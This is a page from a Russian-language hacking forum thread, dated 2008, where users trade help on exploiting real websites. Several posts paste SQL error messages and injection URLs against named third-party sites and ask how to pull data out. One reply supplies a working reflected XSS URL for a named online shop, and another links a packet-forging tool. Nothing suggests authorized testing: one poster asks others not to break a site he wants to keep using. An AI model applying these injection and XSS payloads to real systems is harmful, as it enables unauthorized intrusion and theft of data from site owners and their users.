ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 71 из 1377 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.01.2008, 16:21
RekRut
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774

Репутация: 71
По умолчанию
Есть такая трабла, Mysql injection срабатывает после POST запроса и выдает следующее
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and b.science_category_id=1 and b.science_pubdate=1) inner join udb_science_c' at line 1


можно ли здесь что либо подобрать или нахимичить ??
 

  #2  
Старый 13.01.2008, 16:26
keeberg
Banned
Регистрация: 05.01.2008
Сообщений: 49
Провел на форуме:
368185

Репутация: 59
По умолчанию
Тебе поможет фальсификатор пакетов InetCrack v1.39
Вот юзай наздаровье.... --> http://webfile.ru/1681376
 

  #3  
Старый 13.01.2008, 18:44
RekRut
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774

Репутация: 71
По умолчанию
Цитата:
Тебе поможет фальсификатор пакетов InetCrack v1.39 Вот юзай наздаровье.... --> http://webfile.ru/1681376

ето я то знаю как запрос послать, проблема не в етом, я иммел ввиду, что можно ли тут подобрать количество колонок или нельзя ?? ну тоесть стандартным методом тут надо работать или как ??
 

  #4  
Старый 15.01.2008, 09:35
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Помогите вот с этим :

MySQL error : You have an error in your SQL syntax near ''A variable type check failed, expecting G/INT for \"s\" : 20\' - /index.php?zh=' at line 1

URL: http://www.nu-44.ru/index.php?zh=topics&s=20'

и что можно получить из этого по максимуму.... тока не ломайте его он мне нужен рабочим плизззз
 

  #5  
Старый 16.01.2008, 13:33
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
Провел на форуме:
33325

Репутация: 0
По умолчанию
Код:
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--
Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
 

  #6  
Старый 15.01.2008, 09:46
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
там фильтрация стоит навряд-ли, что можно сделать
 

  #7  
Старый 15.01.2008, 12:54
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Хорошо а тогда что мона с этим сделать???
_http://shop.winm.ru/index.php?productID=262'

ошибка:
Цитата:
You have an error in your SQL syntax near ''262''' at line 1 SQL query : SELECT categoryID FROM SS_products WHERE productID='262''
Последний раз редактировалось KIR@PRO; 17.01.2008 в 02:58..
 

  #8  
Старый 15.01.2008, 12:57
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
 

  #9  
Старый 15.01.2008, 16:49
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
Цитата:
Сообщение от it's my  
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
 

  #10  
Старый 15.01.2008, 16:46
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию
На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject
 
 
Страница 71 из 1377 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ